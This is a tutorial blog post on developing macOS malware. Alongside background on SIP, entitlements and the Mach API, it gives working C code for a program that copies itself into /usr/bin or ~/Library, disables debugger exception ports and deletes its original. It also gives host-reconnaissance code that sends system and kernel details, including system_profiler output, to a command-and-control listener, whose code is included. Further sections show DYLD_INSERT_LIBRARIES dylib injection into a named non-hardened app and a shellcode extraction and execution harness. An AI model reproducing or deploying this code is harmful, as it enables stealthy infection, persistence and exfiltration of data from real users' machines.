macOS Malware Development

0xf00I · March 9, 2024, 2:01am

Introduction

In this article, we’ll delve into the world of designing and developing malware for macOS, which is essentially a Unix-based operating system. We’ll take a classic approach to exploring Apple’s internals. All you need is a basic understanding of exploitation, along with knowledge of C and Python programming, as well as some familiarity with low-level assembly language to grasp the details here. While the topics discussed may be advanced, I’ll do my best to present them smoothly.

Let’s start by understanding the macOS architecture and its security features. We’ll then delve into the internals, covering key elements like the Mach API and kernel, and we’ll walk through some basic system calls and examples that are easy to understand. Next, we’ll introduce a dummy malware. Later on, we’ll explore code injection techniques and how they’re utilized in malware. We’ll also touch on persistence methods. To conclude, we’ll demonstrate a basic implementation of shellcode injection and persistence. Throughout, we’ll provide a detailed, step-by-step breakdown of the code and techniques involved.

Background

a little background from the internet, The Mac OS X kernel (xnu) is an operating system kernel with a unique lineage, merging the research-oriented Mach microkernel with the more traditional and contemporary FreeBSD monolithic kernel. The Mach microkernel combines a potent abstraction—Mach message-based interprocess communication (IPC)—with several cooperating servers to constitute the core of an operating system. Responsible for managing separate tasks within their own address spaces and comprising multiple threads, the Mach microkernel also features default servers that offer services like virtual memory paging and system clock management.

However, the Mach microkernel alone lacks crucial functionalities such as user management, file systems, and networking. To address this, the Mac OS X kernel incorporates a graft of the FreeBSD kernel, specifically its top-half (system call handlers, file systems, networking, etc.), ported to run atop the Mach microkernel. To mitigate performance concerns related to excessive IPC messaging between kernel components, both kernels reside in the same privileged address space. Nevertheless, the Mach API accessible from kernel code remains consistent with the Mach API available to user processes.

Osx

Before delving into macOS development, it’s crucial to grasp the fundamentals of the operating system. In this discussion, we’ll primarily focus on understanding the security protections, particularly System Integrity Protection (SIP),

SIP serves as a vital security feature designed to safeguard critical system files, directories, and processes from unauthorized modification or tampering by applications. It imposes restrictions on write access to protected system locations, even for processes with root privileges, thus preventing unauthorized alterations. Moreover, SIP implements additional security measures for system extensions and kernel drivers. For instance, kernel extensions are required to be signed by Apple or by developers using a valid Developer ID. This stringent requirement ensures that only trusted extensions are permitted to load into the kernel, bolstering the overall security of the system.

As we can see, SIP (System Integrity Protection) is turned on, indicating that the system is benefiting from its security features. The presence of the “restricted” flag on certain directories highlights SIP’s protection of those specific areas. It’s important to note that SIP’s shielding may not extend to subdirectories within a SIP-protected directory.

To overcome this limitation, Firmlinks come into play. These allow certain directories to be “firmlinked,” which are special symbolic links protected by SIP. This ensures their functionality even in SIP-protected locations, enhancing compatibility, Which operate seamlessly, allowing applications and scripts to treat them as regular symbolic links without any special handling. This enables the creation of symbolic links in directories like /usr, /bin, /sbin, and /etc, which were previously inaccessible due to SIP.

By making use of firmlinks, developers and users can address compatibility challenges while still enjoying the security advantages of SIP. It strikes a balance between system protection and accommodating the needs of applications and scripts that rely on symbolic links in macOS. The use of firmlinks allows for access and modification of certain directories, even in traditionally protected locations. For instance, a firmlink can grant write access to /usr/local, providing flexibility for installing and managing software and scripts in that directory.

Entitlements

Now, onto Entitlements, Entitlements are permissions granted to applications on macOS, dictating their level of access and capabilities within the system. They control the application’s ability to interact with various system resources, including the network, file system, hardware, and user privacy-related information. By granting specific entitlements, macOS ensures that applications have the necessary permissions to perform their intended tasks while maintaining system integrity and protecting user privacy.

Entitlements are typically stored in the application’s Info.plist file, which is located within the .app bundle. The Info.plist file contains metadata and configuration details about the application, and it includes key-value pairs representing the entitlements. Each entitlement is represented by a key, denoting the specific permission or access level, and a value that defines its corresponding setting.

For example, an entitlement entry in the Info.plist file may appear as follows:

<key>com.apple.security.network.client</key>
<true/>

In this case, the entitlement with the key “com.apple.security.network.client” indicates that the application has permission to act as a network client, granting it access to network resources.

We can obtain entitlements of an application by using the following command:

codesign --display --entitlements - /path/to/foo.app

The specific entitlements and their corresponding keys and values can vary based on the application’s requirements and the resources it needs to access. By defining entitlements, macOS ensures that applications operate within predefined boundaries, promoting security, privacy, and controlled access to system resources.

Info.plist

Now, let’s talk about Property List (plist) files. file format used on macOS to store structured data, such as configuration settings, preferences, and metadata. They have a hierarchical structure with key-value pairs and support various data types. Property list files can be in XML or binary format.

In the context of macOS, property list files are commonly used for storing application metadata, entitlements, sandboxing settings, and code signing details. For example:

Entitlements: Property list files, like the Info.plist, can contain entitlements that grant permissions to applications, specifying their access to system resources.
Sandbox: Property list files define sandbox settings that restrict an application’s access to resources, enhancing security and protecting user privacy.
Code Signing: Property list files store information related to code signing, verifying the authenticity and integrity of an application.

Property List (plist) files can hold various data types and have a hierarchical structure. Here are some commonly used data types and an example of the plist file structure:

Data Types:
- String: A sequence of characters.
- Number: Represents numeric values, including integers and floating-point numbers.
- Boolean: Represents true or false values.
- Date: Represents a specific date and time.
- Array: An ordered collection of values.
- Dictionary: A collection of key-value pairs, where each key is unique.

Here’s an example of a plist file structure:

<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
  <dict>
    <key>com.apple.security.app-sandbox</key>
    <true/>
    <key>com.apple.security.files.user-selected.read-only</key>
    <true/>
    <key>com.apple.security.network.client</key>
    <true/>
  </dict>
</plist>

In this example, the property list file contains a dictionary with several entitlement keys related to sandboxing. Each key represents a specific entitlement, and the value <true/> indicates that the corresponding entitlement is enabled.

The three entitlements mentioned in this example are:

com.apple.security.app-sandbox: Enables sandboxing for the application.
com.apple.security.files.user-selected.read-only: Allows read-only access to user-selected files.
com.apple.security.network.client: Grants the application permission to act as a network client.

This simplified example demonstrates how property list files can store entitlements related to sandboxing, providing a structured format for specifying the application’s access and permissions within the sandbox environment.

We can use otool to read Info.plist in different formats:

plutil -convert xml1 /Applications/Safari.app/Contents/Info.plist -o - 
plutil -convert json /Applications/Safari.app/Contents/Info.plist -o -

Overall, property list files play a crucial role in macOS by providing a structured and standardized format to store important information related to entitlements, sandboxing, code signing, and more. They enable applications and system components to access and manage this data efficiently, contributing to the security and integrity of the macOS ecosystem.

That’s all we need to know for now. There’s more to explore, such as Gatekeeper, Sandboxing, App Bundles, and so on, but these are the most important security mechanisms that matter to us for development. Now let’s delve a bit deeper and discuss internal architecture. Why focus on internals? Well, even though I’m not planning to develop a rootkit or anything as advanced, it’s crucial to understand the OS as thoroughly as possible from a developer’s perspective. After all, we’re writing software.

Mach API’s

Let’s take a quick look at Mach. Initially designed as a communication-centric operating system kernel with robust multiprocessing support, Mach aimed to lay the groundwork for various operating systems. It favored a microkernel architecture, aiming to keep essential OS services like file systems, I/O, memory management, networking, and different OS personalities separate from the kernel.

XNU, whimsically named “X is not UNIX,” serves as the kernel for Mac OS X. Positioned at the core, Darwin and the rest of the OS X software stack rely on the XNU kernel.

XNU stands out as a hybrid operating system, blending a hardware/Io tasking interface from the minimalist Mach microkernel with elements from FreeBSD kernel and its POSIX-compliant API. Understanding how programs map to processes in virtual memory on OS X can be a bit tricky due to overlapping definitions. For example, the term “thread” could refer to either the POSIX API pthreads from BSD or the fundamental unit of execution within a Mach task. Moreover, there are two distinct sets of syscalls, each mapped to positive (Mach) or negative (BSD) numbers.

Mach provides a virtual machine interface, abstracting system hardware—a common feature in many operating systems. Its core kernel is designed to be simple and extensible, boasting an Inter-Process Communication (IPC) mechanism that underpins many kernel services. Notably, Mach seamlessly integrates IPC capabilities with its virtual memory subsystem, leading to optimizations and simplifications across the OS.

On OS X, we deal with “tasks” rather than processes. Tasks, similar to processes, serve as OS-level abstractions containing all the resources needed to execute a program. Technically, Mach refers to its processes as tasks, although the concept of a BSD-style process that encapsulates a Mach task persists. Resources within a task include:

A virtual address space
Inter-process communication (IPC) port rights
One or more threads

“Ports” serve as an inter-task communication mechanism, using structured messages to transmit information between tasks. Operating solely in kernel space, ports act like P.O. Boxes, albeit with restrictions on message senders. Ports are identified by Task-specific 32-bit numbers.

Threads are units of execution scheduled by the kernel. OS X supports two thread types (Mach and pthread), depending on whether the code originates from user or kernel mode. Mach threads reside at the OS’s lowest level in kernel-mode, while pthreads from the BSD realm execute programs in user-mode. (More in this, later)

Mach redefines the traditional Unix notion of a process into two components: a task and a thread. In the kernel, a BSD process aligns with a Mach task. A task serves as a framework for executing threads, encapsulating resources and defining a program’s protection boundary. Mach ports, versatile abstractions, facilitate IPC mechanisms and resource operations.

IPC messages in Mach are exchanged between threads for communication, carrying actual data or pointers to out-of-line data. Message transfer is asynchronous, with port capabilities exchanged through messages.

Mach’s virtual memory system encompasses machine-independent components like address maps and memory objects, alongside machine-dependent elements like the physical map. Memory objects serve as containers for data mapped into a task’s address space, managed by various pagers handling distinct memory types. Exception ports, assigned to each task and thread, facilitate exception handling, allowing multiple handlers to suspend affected threads, process exceptions, and resume or terminate threads accordingly.

Let’s explore the basics of Mach System Calls, including retrieving system information and performing code injection. This will provide a fundamental understanding of interacting with macOS, By the way, a system call is a function of the kernel invoked by a user space. It can involve tasks like writing to a file descriptor or exiting a program. Typically, these system calls are wrapped by C functions in the standard library.

Baby Steps

If we head over to the Mach IPC Interface or Apple documentation we can find a Mach system call that’s pretty handy for getting basic info about the host system. It tells us stuff like how many CPUs there are, both maximum and available, the physical and logical CPUs, memory size, and the max memory size. This call is host_info(), and it’s super useful for getting details about a host, like what kind of processors are installed, how many are currently available, and the total memory size.

Now, like a lot of Mach “info” calls, host_info() needs a flavor argument to specify what kind of info you want. For instance:

kern_return_t host_info(host_t host, host_flavor_t flavor,
                        host_info_t host_info,
                        mach_msg_type_number_t host_info_count);

HOST_BASIC_INFO: Returns basic system information.
HOST_SCHED_INFO: Provides scheduler-related data.
HOST_PRIORITY_INFO: Offers scheduler-priority-related information.

Besides host_info(), other calls like host_kernel_version(), host_get_boot_info(), and host_page_size() can be employed to access miscellaneous system details.

int main() {
    kern_return_t kr; /* the standard return type for Mach calls */
    mach_port_t myhost;
    char kversion[256]; 
    host_basic_info_data_t hinfo;
    mach_msg_type_number_t count;
    vm_size_t page_size;
  

    // Retrieve System Information
    printf("Retrieving System Information...\n");

    // Get send rights to the name port for the current host
    myhost = mach_host_self();

    // Get kernel version
    kr = host_kernel_version(myhost, kversion);
    EXIT_ON_MACH_ERROR("host_kernel_version", kr);

    // Get basic host information
    count = HOST_BASIC_INFO_COUNT; // size of the buffer
    kr = host_info(myhost, HOST_BASIC_INFO, (host_info_t)&hinfo, &count);
    EXIT_ON_MACH_ERROR("host_info", kr);

    // Get page size
    kr = host_page_size(myhost, &page_size);
    EXIT_ON_MACH_ERROR("host_page_size", kr);

    printf("Kernel Version: %s\n", kversion);
    printf("Maximum CPUs: %d\n", hinfo.max_cpus);
    printf("Available CPUs: %d\n", hinfo.avail_cpus);
    printf("Physical CPUs: %d\n", hinfo.physical_cpu);
    printf("Maximum Physical CPUs: %d\n", hinfo.max_cpus);
    printf("Logical CPUs: %d\n", hinfo.logical_cpu);
    printf("Maximum Logical CPUs: %d\n", hinfo.logical_cpu);
    printf("Memory Size: %llu MB\n", (unsigned long long)(hinfo.memory_size >> 20));
    printf("Maximum Memory: %llu MB\n", (unsigned long long)(hinfo.max_mem >> 20));
    printf("Page Size: %u bytes\n", (unsigned int)page_size);

    // Clean up and exit
    mach_port_deallocate(mach_task_self(), myhost);
    exit(0);
}

So, basically, the code is pretty easy to understand. It just grabs system information and shows things like the Kernel version, right? It’s simple and harmless. But if we want to learn more about system calls, we need something different. How about something that acts more like malware? But let’s keep it simple at first. We can start by writing a code that write a copy of itself to either /usr/bin/ or /Library/.

To achieve this kind of behavior, we need to use task operations because we need to control another process and access system processes. I found specific Mach system calls like pid_for_task(), task_for_pid(), task_name_for_pid(), and mach_task_self(), which allow conversion between Mach task ports and Unix PIDs. However, they essentially bypass the capability model, which means they are restricted on macOS due to UID checks, entitlements, SIP, etc., limiting their use, and are not documented as part of a public API and are privileged, typically accessible only by processes with elevated privileges like root or members of the procview group. This limitation poses a challenge because malware would need elevated privileges or execution on a privileged account to work unless obtained through various means.

Thus, we can’t use task_for_pid on Apple platform binaries due to SIP. However, if permitted, we would have the port and could essentially do anything we want including what I’m about to explain. Therefore, So for this example we’ll use mach_task_self() as it typically does not require privileges. It retrieves information about the current task, depending on the security policies enforced.

void hide_process() {
    mach_port_t task_self = mach_task_self();
    kern_return_t kr;

    // Set exception ports to disable debuggers.
    kr = task_set_exception_ports(task_self, EXC_MASK_ALL, MACH_PORT_NULL, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, THREAD_STATE_NONE);
    if (kr != KERN_SUCCESS) {
        printf("Uh-oh: Failed to set exception ports: %s\n", mach_error_string(kr));
        exit(EXIT_FAILURE);
    }

    printf("Shhh... Process is now hidden\n");
}

the function obtains the task port for the current process using mach_task_self(), which essentially retrieves a send right to a task port. In the Mach kernel, a task port represents a task, and sending a message to this port enables actions to be performed on the corresponding task.

Next, to set the exception ports to disable debuggers and other forms of external monitoring. This is achieved through the task_set_exception_ports() function call. and any received messages should be directed to a null Mach port. The process then exits with a failure status.

void copy_file(const char *source_path, const char *dest_path) {
    FILE *source_file = fopen(source_path, "rb");
    if (source_file == NULL) {
        printf("Oops: Failed to open source file for copying: %s\n", strerror(errno));
        exit(EXIT_FAILURE);
    }

    FILE *dest_file = fopen(dest_path, "wb");
    if (dest_file == NULL) {
        printf("Oops: Failed to open destination file for copying: %s\n", strerror(errno));
        fclose(source_file); 
        exit(EXIT_FAILURE);
    }

    char buffer[BUF_SIZE];
    size_t bytes_read;
    while ((bytes_read = fread(buffer, 1, sizeof(buffer), source_file)) > 0) {
        fwrite(buffer, 1, bytes_read, dest_file);
    }

    fclose(source_file);
    fclose(dest_file);

    // Grant execute permission for the copied binary
    if (chmod(dest_path, PERMISSIONS) == -1) {
        printf("Oops: Failed to set execute permission for %s\n", dest_path);
        exit(EXIT_FAILURE);
    }

    printf("Hey! copied from %s to %s\n", source_path, dest_path);
}

The function reads data from the source file in chunks and writes it to the destination file until the entire file is copied. After copying, it sets execute permission for the copied binary using chmod() to make it executable.

// Main function
int main(int argc, char *argv[]) {
    // Determine home directory
    const char *home_dir;
    struct passwd *pw = getpwuid(getuid());
    if (pw == NULL) {
        printf("Oops: Failed to get home directory\n");
        exit(EXIT_FAILURE);
    }
    home_dir = pw->pw_dir;

    // Construct malware path
    char home_malware_path[PATH_MAX_LENGTH];
    snprintf(home_malware_path, sizeof(home_malware_path), "%s/Library/%s", home_dir, MALWARE_NAME);

    // Check if we have root privileges
    if (geteuid() == 0) {
        // Attempt to copy malware to system directory
        const char *system_malware_path = "/usr/bin/" MALWARE_NAME;
        if (access(system_malware_path, F_OK) != 0) {
            copy_file(argv[0], system_malware_path);
            execute_malware(system_malware_path);
        }
    } else {
        // Attempt to copy malware to user's home directory
        if (access(home_malware_path, F_OK) != 0) {
            copy_file(argv[0], home_malware_path);
            greet_user();
        }
    }

    // Hide the process
    hide_process();

    // Vanish, Damn
    remove(argv[0]);

    return EXIT_SUCCESS;
}

So the logic is as follows: It first checks if it has root privileges by calling geteuid(). If it does, it attempts to copy itself to /usr/bin/, and if successful, it executes the copied binary. If it doesn’t have root privileges, it attempts to copy itself to ~/Library/ (the user’s home directory). If successful, it prints “Hello, World!”. After copying itself it calls hide_process() to attempt to hide the process from detection. Finally, it removes the original binary file to erase traces of its presence.

This demonstrates a basic technique used by malware to hide itself on a system by copying itself to a system directory (/usr/bin/) or the user’s home directory (~/Library/) and then attempting to hide its process from detection.

This is far from being a malicious code, but it does provide us with valuable insights into working with the Mach API and conducting low-level system operations. Through this example, we’ve gained familiarity with essential concepts such as process management and communication.

0x100003e79 <+505>: callq  0x100003c50               ; hide_process
0x100003e7e <+510>: movq   0x17b(%rip), %rax         ; (void *)0x0000000000000000
0x100003e85 <+517>: movl   (%rax), %edi
0x100003e87 <+519>: movl   -0x18(%rbp), %esi
0x100003e8a <+522>: callq  0x100003ec6               ; symbol stub for: mach_port_deallocate
0x100003e8f <+527>: xorl   %edi, %edi
0x100003e91 <+529>: movl   %eax, -0x21ec(%rbp)
0x100003e97 <+535>: callq  0x100003eb4               ; symbol stub for: exit

Here we put a our little program into a debugger, and as you can see specially in the disassembly part there’s instructions correspond to our operation like /usr/bin/ also you can notice the cleanup operations are performed, such as deallocating port and exiting the program.

The Naive Way

After infecting a new host, let’s ensure our malware notifies us of its presence by sending information about the host. Although this method might seem amateurish - a malware shouldn’t connect to a Command & Control server (C2) initially - since we’re just exploring macOS as a new territory, it’s a starting point. We collect system information such as the system name, release version, machine architecture, hardware model, user ID, home directory, etc., and then send this information to the C2. For retrieving or modifying information about the system and environment, we can make use of Developer Apple - sysctlbyname. This function enables us to retrieve specific system information, such as the cache line size, directly from the system kernel.

However, when it comes to System Owner/User Discovery, we typically access user-related data through standard POSIX interfaces like getpwuid(), relying on these interfaces as discussed before. To fetch the hardware model, we would replace "hw.cachelinesize" with "hw.model" in the sysctlbyname function call.

Next, we want to gather more information about the host, not just its hardware model. Now, you may wonder why we don’t just use the first example you introduced. Well, it’s simple. This is to showcase how we access user-related data through standard POSIX interfaces. However, if you want to introduce the hardware model in the above example, just

count = sizeof(model); kr = sysctlbyname("hw.model", model, &count, NULL, 0); EXIT_ON_MACH_ERROR("sysctl hw.model", 1);

we also wanna send some information like kernel version, for possible known vulnerabilities, to escalate, So here’s an example, we use the same function as to get hardware model

size_t len = BUF_SIZE;
if (sysctlbyname("kern.version", &kernel_version, &len, NULL, 0) == 0) {
	send_data(sockfd, "\nKernel Version: ");
	send_data(sockfd, kernel_version);

Now let’s dump and send more information about the profile of the infected host, including details such as System Name, Architecture, Login shell, Home directory and any other relevant data that could aid in further exploiting or maintaining access to the compromised system, W’ll use function such as uname, getpwuid, and getgrgid, Let’s take a look at the code,

void system_info(int sockfd) {
  struct utsname sys_info;
  char kernel_version[BUF_SIZE];

  // Get system information
  if (uname( & sys_info) != 0) {
    send_error("Failed to get system information");
    return;
  }

  send_data(sockfd, "\nSystem Name: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nRelease Version: ");
  send_data(sockfd, sys_info.release);
  send_data(sockfd, "\nMachine Architecture: ");
  send_data(sockfd, sys_info.machine);
  send_data(sockfd, "\nOperating System: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nVersion: ");
  send_data(sockfd, sys_info.version);

So, the function is pretty self-explanatory; it simply provides a snapshot of the system and user environment, which is crucial for gathering information on potential targets. However, since malware typically only has one chance for infection, it needs to be self-reliant before attempting to Phone Home. This is why the approach of using a dummy malware, primarily for testing and exploring options before developing an actual malware, is essential.

Nevertheless, deploying a dummy malware still provides attackers with a significant amount of information that could be leveraged for subsequent targeted attacks or exploiting vulnerabilities, whether in the kernel or user land. The malware could be multi-staged to ensure stealth and a low profile. This code can act as stage 1 of an attack, proliferating itself in the system, waiting to activate stage 2, and so on. These types of attacks are advanced and hard to detect, especially in environments like macOS, where malware can remain undetected for years.

Another type of information gathering employed by macOS malware, as seen in some reports, involves ‘LOLBins’ (Living off the Land Binaries). You can program the malware to simply execute /usr/sbin/system_profiler -nospawn -detailLevel full, For example.

void system_profiler(int sockfd) {
  FILE * fp;
  char buffer[BUF_SIZE];

  // Execute
  fp = popen("/usr/sbin/system_profiler -nospawn -detailLevel full", "r");
  if (fp == NULL) {
    send_error("Failed");
    return;
  }

  // Read command output and send over to C2 
  while (fgets(buffer, BUF_SIZE, fp) != NULL) {
    send_data(sockfd, buffer);
  }

  pclose(fp);
}

This command alone saves the trouble and provides all the information about a host that an attacker can gather. However, the catch is that such commands are visible and can be easily flagged. Despite this, it remains an easy and effective method for malware to extract details from the infected host.

Alright, so how do we transmit the data? We use socket. This API allows us to send data to the connected endpoint, which in this case is the Command & Control server. Data is sent in the form of strings. To ensure that the data is properly formatted and transmitted over the socket to the C2 server, we rely on functions like send() for sending data, and file I/O functions such as popen() and fgets() for reliable reading and sending of data. It’s pretty simple.

The C2 server is also straightforward, designed solely for handling incoming connections. It won’t have any protection mechanisms to hide itself from the system where it’s running, but this server is basic for demonstration purposes only. I recommend implementing encryption, setting up a database to organize data, and generating a temporary ID to associate with each instance.

The extraction module (ext) starts an autonomous thread listening for incoming connections from malware instances. Once connected, the module simply prints the content of the incoming connection (which is the information extracted by the client) to the standard output.

// The server will keep listening for incoming connections indefinitely
while (1) {
    // Accept a new connection from a client
    cltlen = sizeof(cltaddr);
    cltfd = accept(dexft_fd, (struct sockaddr *) &cltaddr, &cltlen);

    // Check if the accept call was successful
    if (cltfd < 0) {
        // If accept failed, print an error message and continue listening
        printf("Failed to accept incoming connection, %d\n", cltfd);
        continue;
    }

    // Print out information about the connected client
    printf("Collecting data from client %s:%d...\n", inet_ntoa(cltaddr.sin_addr), ntohs(cltaddr.sin_port));

    // Receive data from the client and process it
    while ((br = recv(cltfd, buf, BUF_SIZE, 0)) > 0) {
        // Write the received data to the standard output
        fwrite(buf, 1, br, stdout);
    }

    // Check if an error occurred during data reception
    if (br < 0) {
        printf("ERROR: Failed to receive data from client!\n");
    }

    // Close the client socket
    close(cltfd);
}

return NULL;

As you can see, the code itself is quite simple yet functional. Once the client is executed, the server collects data from the connected clients, and then closes the connection before resuming listening for new connections,

Collecting data from client ...

System Name: Darwin
Release Version: 19.6.0
Machine Architecture: x86_64
Operating System: Darwin

Obviously, this will get flagged within seconds if there’s a security mechanism in place. Why, you may ask? Well, the behavior exhibited here screams malware—from establishing a connection to sending system information and continuously receiving and executing commands from a remote server. The network traffic pattern alone is a red flag. Plus, the transmission of system information immediately after connection establishment… But the good news is that most Mac users assume they’re safe by default, so they don’t entertain the idea that capable malware could go unnoticed.

So, if this were a targeted attack, something with a bit of obfuscation, perhaps polymorphic and advanced covert channels for communication in place, would get the job done. However, this explanation provides a simple overview of how dummy malware can be used as a learning piece of code before developing actual malware. Next, we’ll delve into a topic that I find quite interesting. Yes, you guessed it;

Code Injection

Actually, exploring Code Injection deserves its own article, and I’ll include some resources at the end. However, for now, let’s focus on two techniques that I find quite effective. So, Let’s begin by introducing the first technique, which involves leveraging environment variables or DYLD_INSERT_LIBRARIES for code injection.

DYLD_INSERT_LIBRARIES is actually a powerful feature that allows users to preload dynamic libraries into applications, Both developers and attackers can inject code into running processes without modifying the original executable file is commonly used to intercept function calls, manipulate program behavior, or even introduce malicious functionality into legitimate application, As we gone see, It’s basically a colon separated list of dynamic libraries to load before the ones specified in the program. This lets you test new modules of existing dynamic shared libraries that are used in flat-namespace images by loading a temporary dynamic shared library with just the new modules.

In simple term’s, it will load any dylibs you specify in this variable before the program loads, essentially injecting a dylib into the application, So for example

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))

void foo() {
  printf("Dynamic library injected! \n");
  system("/bin/bash -c 'echo Library injected!'");
}

As you can see we have a function foo() that prints to let us know that we successful injected a library and a system command that execute a shell to echo basically the same thing and that attribute((constructor)) marks the function run before the application’s main function, into which we injected the dylib, piece of cake right, But how do we know identify binaries vulnerable to environment variable injection, on that later, but first let’s just try it on one of our previous program, So just compile that code like any other program and run it.

~ > gcc -dynamiclib inject.c -o inject.dylib

~ > DYLD_INSERT_LIBRARIES=inject.dylib ./foo
Dynamic library injected!
Library injected!

et voilà, When affected, what happens is that it loads any dylibs specified in this variable before the program loads, essentially injecting a dylib into the application. This could potentially lead to privilege escalation, right? Not so fast on the Apple platform binaries. As of macOS 10.14, third-party developers can opt in to a hardened runtime for their application, which can prevent the injection of dylibs using this technique.

So, basically, we can still perform injection when the application is not defined as having a “Hardened Runtime” and therefore allows the injection of dylibs using the environment variable. Alternatively, when the binary is using a hardened runtime and the developer released it with the appropriate entitlements, let’s go over this one more time:

The “Disable-library-validation” entitlement allows any dylib to run on the binary even without checking who signed the file and the library. This permission usually exists in programs that allow community-written plugins.
The com.apple.security.cs.allow-dyld-environment-variables entitlement loosens the hardened runtime restrictions and allows the use of DYLD_INSERT_LIBRARIES to inject a library.

Alright on possible target application, For example to run this on Safari.app It won’t work, because is hardened and lacks the matching entitlement,

But that doesn’t necessarily imply that the application is not hardened, as there are other Hardened Runtime features that may not be reflected in the entitlements. So, to expedite the process, I found that Veracrypt is not using Hardened Runtime. Therefore, I’m going to use it as an example for the entire article. Sorry :), Now, let’s attempt to inject it, but first…

__attribute__((constructor))

static void customConstructor(int argc, const char **argv)
{
printf("Foo!\n");
syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}

So, we simply print ‘foo’ and log a message using the syslog() function, which logs an error message indicating successful injection of a dynamic library (dylib) along with the name of the program. Let’s try it. If we see the following output, it seems that we’ve successfully loaded the library:

If we attempt to use DYLD_INSERT_LIBRARIES in another binary that is hardened and lacks the matching entitlement, we won’t be able to load the library, and consequently, we won’t see the desired output.

However, some internal components of macOS expect threads to be created using the BSD APIs and have all Mach thread structures and pthread structures set up properly. This can present challenges, especially with changes introduced in macOS 10.14.

To address this issue, I came across a piece of code called inject.c. Additionally, I highly recommend reading the “Mac Hacker’s Handbook” as it provides invaluable insights and includes great examples of interprocess code injection.

From my understanding, the transition from Mach thread APIs to pthread APIs in macOS, particularly concerning the initialization of thread structures, presents challenges. However, the discovery of the _pthread_create_from_mach_thread function provides a viable alternative for initializing pthread structures from bare Mach threads. This ensures compatibility and proper functioning of threaded applications across different macOS versions.

For those interested, I’ve included examples demonstrating how to inject code to call dlopen and load a dylib into a remote mach task: Gist 1 & Gist 2"

Alright, let’s discuss the second technique. It’s similar to methods used on Windows, and one common approach is process injection, which is the ability for one process to execute code in a different process. In Windows, this is often utilized to evade detection by antivirus software, for example, through a technique known as DLL hijacking. This allows malicious code to masquerade as part of a different executable. In macOS, this technique can have significantly more impact due to the differences in permissions between applications.

In the classic Unix security model, each process runs as a specific user. Each file has an owner, group, and flags that determine which users are allowed to read, write, or execute that file. Two processes running as the same user have the same permissions; it is assumed there is no security boundary between them. Users are considered security boundaries; processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.

This was essentially the same security model as macOS until the introduction of … yep, SIP (System Integrity Protection)

OS X Shellcode Injection

Alright, so we’re going to write a simple shellcode injection program where the malware’s host process injects shellcode into the memory of a remote process. But before we proceed, let’s write a simple shellcode for testing purposes.

Writing 64-bit assembly on macOS differs somewhat from ELF. Here, you just need to understand the macOS executable file format, known as Mach-O. However, for simplicity, we’ll stick with the x86_64 architecture and we can later use a linker for Mach-O executables.

A simple “Hello World” program starts by declaring two sections: .data and .text. The .data section is used for storing initialized data, while the .text section contains executable code. Then we define the _main function as the entry point of the program, followed by a reference point in the code, which we’ll call trick. The trick section will be followed by a call instruction that invokes the continue subroutine and pops the address of the string ‘Hello World!’. Also, if you notice in the code, we have a system call at the end that exits our program. The first syscall is for writing data.

section .data
section .text

global _main
	_main:

start:
	jmp trick

continue:
	pop rsi            ; Pop string address into rsi
	mov rax, 0x2000004 ; System call write = 4
	mov rdi, 1         ; Write to standard out = 1
	mov rdx, 14        ; The size to write
	syscall            ; Invoke the kernel
	mov rax, 0x2000001 ; System call number for exit = 1
	mov rdi, 0         ; Exit success = 0
	syscall            ; Invoke the kernel
	
trick:
	call continue
	db "Hello World!", 0, 0

Alright, it’s time to compile. I typically use NASM for assembling my code. Remember what I mentioned about using the linker to create Mach-O executables? Well, after assembling the code with NASM, we’ll need to link it using ld. This linker not only brings together the assembled code but also incorporates necessary system libraries.

~ > ./nasm -f macho64 Hello.asm -o hello.o && ld ./Hello.o -o Hello -lSystem -syslibroot `xcrun -sdk macosx --show-sdk-path`

~ > ./Hello
Hello World!

Pretty sophisticated, right? Now, to actually turn it into machine code that we can use for injection, it needs to be converted into a hexadecimal representation. This representation consists of a small series of bytes that represent executable machine-language code. It essentially represents the exact sequence of instructions that the processor will execute. For this, we can utilize objdump.

~ > objdump -d ./Hello | grep '[0-9a-f]:'| grep -v 'file'| cut -f2 -d:| cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '| sed 's/ $//g'| sed 's/ /\\x/g'| paste -d '' -s | sed 's/^/"/'| sed 's/$/"/g'

`\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a`

If, for some reason, you can’t extract the shellcode solely relying on objdump, you can always script kiddy a simple py, to parse the assembly output;

def extract_shellcode(objdump_output):
    shellcode = ""
    length = 0
    lines = objdump_output.split('\n')
    
    for line in lines:
        if re.match("^[ ]*[0-9a-f]*:.*$", line):
            line = line.split(":")[1].lstrip()
            x = line.split("\t")
            opcode = re.findall("[0-9a-f][0-9a-f]", x[0])
            for i in opcode:
                shellcode += "\\x" + i
                length += 1

    return shellcode, length

def main():
    objdump_output = sys.stdin.read()
    shellcode, length = extract_shellcode(objdump_output)
    
    if shellcode == "":
        print("Bad")
    else:
        print("\n" + shellcode)

if __name__ == "__main__":
    main()

But does the shellcode work? To ensure its functionality, we should test whether we can perform a simple injection. One way to do this is by compiling the shellcode and storing it as a global variable within the executable’s __TEXT,__text section. We can achieve this by declaring the shellcode as a variable within the code itself. Here’s a simple example:

const char output[] __attribute__((section("__TEXT,__text"))) =  "
\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01
\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05
\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00
\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c
\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a";

typedef int (*funcPtr)();

int main(int argc, char **argv)
{
    funcPtr ret = (funcPtr) output;
    (*ret)();

    return 0;
}

